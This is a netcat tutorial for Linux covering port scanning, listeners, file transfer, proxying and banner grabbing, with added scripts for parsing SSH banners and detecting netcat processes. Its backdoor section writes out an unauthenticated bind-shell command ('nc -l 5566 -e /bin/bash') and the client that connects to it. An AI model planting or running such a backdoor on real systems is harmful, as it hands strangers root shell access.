This comprehensive Linux guide expects that you run the following commands as the root user. If you decide to run them as a different user, ensure that the user has sudo access and that you precede each of the privileged commands with sudo.
netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.
It works similarly to the cat command, but for the network: it reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to Linux users and is often called the Swiss Army Knife of networking tools. It is most often used by networking specialists to monitor, test and send data across a network.
In this tutorial, we will show you the use of the netcat command with multiple examples.
Installing netcat Command
To install the netcat command on your Linux machine, you can run the following command:
On Debian Based Systems
root@codesposts:~$ apt install netcat
On Red-Hat Based Systems Or CentOS
root@codesposts:~$ yum install nmap-ncat
General Syntax
The following is the general syntax of the netcat command:
root@codesposts:~$ netcat [options] host port
OR
root@codesposts:~$ ncat [options] host port
OR
root@codesposts:~$ nc [options] host port
Using netcat For Port Scanning
netcat is most commonly used for port scanning. You can scan a single port as well as multiple ports or a range of ports. You can use the option -z for only scanning the open ports without sending any data and the option -v to get a more detailed output.
root@codesposts:~$ nc -z -v 155.138.206.18 80
Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) open
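If you want to display only the open ports, you can filter the output through the grep command. netcat writes its -v status lines to stderr, so redirect stderr into the pipe with 2>&1. The word "succeeded" is what OpenBSD netcat prints for an open port; the traditional netcat shown above prints "open" instead.
root@codesposts:~$ nc -z -v 155.138.206.18 80-300 2>&1 | grep succeeded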
Listening To Inbound Connections
You can also use this command to listen for inbound connections to your system by using the option -l with a specific port to listen on.
root@codesposts:~$ nc -l port
root@codesposts:~$ nc -l 8080
Connecting To A System Remotely
You can connect to another system remotely using this command. You can run the command like below
root@codesposts:~$ nc IP_Address Port
root@codesposts:~$ nc 192.168.1.1 80
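Checking Server Software And Its Version
You can also use the netcat command to find the server software and its version by sending the “EXIT” command to the server on the default SSH port 22 like below. The SSH server announces its identification string as soon as the connection opens; “EXIT” is not a valid SSH message, which is why the server then answers “Protocol mismatch.”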
root@codesposts:~$ echo "EXIT" | nc 155.138.206.18 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.
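The first line of that reply follows the SSH identification-string format from RFC 4253 (SSH-protoversion-softwareversion SP comments). The following added example (not part of the original tutorial) picks the banner out of a captured reply and splits it into fields, for instance to build a version inventory of your own hosts; the function names are hypothetical.

```sh
#!/bin/sh
# Added example (not from the original tutorial). Function names are hypothetical.

# Print the first SSH identification line from a captured reply on stdin.
# RFC 4253 lets a server send other lines before it, so do not assume line 1.
first_ssh_banner() {
    tr -d '\r' | sed -n '/^SSH-/{p;q;}'
}

# Split "SSH-protoversion-softwareversion SP comments" into labelled fields.
# Prints nothing and returns 1 if the line is not an SSH identification string.
parse_ssh_banner() {
    case $1 in
        SSH-*-?*) ;;
        *) return 1 ;;
    esac
    rest=${1#SSH-}
    proto=${rest%%-*}          # text up to the first "-" after "SSH-"
    rest=${rest#*-}
    case $rest in
        *' '*) software=${rest%% *}; comment=${rest#* } ;;
        *)     software=$rest;       comment= ;;
    esac
    printf 'proto=%s software=%s comment=%s\n' "$proto" "$software" "$comment"
}

# The reply shown in the tutorial above, reused as sample input.
sample_reply() {
    printf 'SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6\r\nProtocol mismatch.\n'
}

# Live use: echo "EXIT" | nc HOST 22 | first_ssh_banner
parse_ssh_banner "$(sample_reply | first_ssh_banner)"
```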
Chatting With A Remote System
You can also use the netcat command to make a chat system between one host and another. First, you need to set up a host to listen on a specific port. Then you need to connect to that host using that port from your system.
From Server side
root@codesposts:~$ nc -l 4444
From Client Side
root@codesposts:~$ nc server-IP 4444
Replace “server-IP” with the IP of the host that is listening for an inbound connection.
Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.
Sending/Receiving Files
You can also use the netcat command to send or receive files from one host to another.
For this, you first need to start the listener on the system on which the file is to be received.
root@codesposts:~$ nc -l 4444 > file.txt
Now, you can send the file from the other host using this port by running the command like this
root@codesposts:~$ nc host-IP 4444 < file.txt
Replace the “host-IP” with the IP of the host that is listening for the file to be received.
Sending/Receiving Directory
If you want to send a directory using the netcat command, you first need to make an archive of that directory using the tar command and then send it over using the netcat command.
root@codesposts:~$ tar czvf - /path/to/directory | nc host-IP 4444
Then you can receive the file and extract it using the command like this
root@codesposts:~$ nc -l 4444 | tar xzvf -
Using netcat As Proxy
You can also use the netcat command as a proxy for your system.
root@codesposts:~$ nc -l 4444 | nc 192.168.100.1 40
Now all the connections coming to our server on port 4444 will be automatically redirected to the 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred in one direction. To be able to receive the data back, we need to create a two-way pipe. Use the following commands to do so:
root@codesposts:~$ mkfifo 2way
root@codesposts:~$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way
After this command, you will be able to send and receive data over the proxy.
Using UDP Ports
If you want to scan UDP ports, you can just add the option -u to the command:
root@codesposts:~$ nc -u -z -v 192.168.100.1 80-200
192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) open
Similarly, you can add this option to any netcat command to make it use UDP ports.
Creating A Backdoor Using netcat Command
You can also use the netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:
root@codesposts:~$ nc -l 5566 -e /bin/bash
The -e flag attaches a bash shell to the listening port. A client that connects to that port on the server will then have complete access to our system via bash, without any authentication, by running the command like this:
root@codesposts:~$ nc 192.168.100.1 5566
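From the defender's side, a listener like the one above is visible in the process table with an execute option on its command line. The following added example (not part of the original tutorial) flags such processes in `ps -eo pid,user,args` output; the sample listing is constructed and the function names are hypothetical.

```sh
#!/bin/sh
# Added example (not from the original tutorial). Function names are hypothetical.

# Constructed sample of `ps -eo pid,user,args` output.
sample_ps() {
cat <<'EOF'
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 4211 www-data nc -l 5566 -e /bin/bash
 4300 alice    nc -l 4444
 4388 root     ncat --sh-exec /bin/sh -l 9001
 4412 bob      nc -w 10 192.168.100.1 4444
 4500 root     /bin/netcat -lvp 7777 -c /bin/sh
 4600 carol    rsync -e ssh src/ backup:dst/
EOF
}

# Print "PID USER OPTION" for every nc/ncat/netcat process whose arguments
# include an execute option: -e/--exec, -c/--sh-exec, or ncat's --lua-exec.
# Upstream OpenBSD nc uses -c for TLS, so treat -c hits as leads to review.
find_exec_netcat() {
    awk '
    {
        n = split($3, parts, "/"); prog = parts[n]   # basename of the program
        if (prog != "nc" && prog != "ncat" && prog != "netcat") next
        for (i = 4; i <= NF; i++)
            if ($i ~ /^--(sh-|lua-)?exec(=.*)?$/ || $i ~ /^-[A-Za-z]*[ec]$/) {
                print $1, $2, $i
                next
            }
    }'
}

# Live use: ps -eo pid,user,args | find_exec_netcat
sample_ps | find_exec_netcat
```

The rsync line in the sample is there to show that an -e option on a non-netcat program is not flagged.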
Running A Web Server With A Static Page Using netcat
You can also start a web server using the netcat command on a local host that will serve a static web page “sample.html”.
First, make a new file with the name “sample.html” and copy the following code into the file.
<html>
<head>
<title>Test Page</title>
</head>
<body>
<h1>Level 1 header</h1>
<h2>Subheading</h2>
<p>Normal text here</p>
</body>
</html>
Then run the following command:
root@codesposts:~$ while true; do sudo nc -lp 80 < sample.html; done
After this, you can access the page by going to “http://server-IP.com/sample.html”.
Setting The Connection Timeout
If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command.
root@codesposts:~$ nc -w 10 192.168.100.1 4444
Making The Server Persistent
The server will terminate automatically when the client disconnects from it. To make the server keep listening for more connections even after a client disconnects, you can use the option -k with the netcat command.
root@codesposts:~$ nc -l -k 4444
Performing HTTP Request
You can also use this command to send various HTTP requests to a remote server.
For example, if you want to retrieve the netcat man page from the OpenBSD web site, run this command:
root@codesposts:~$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80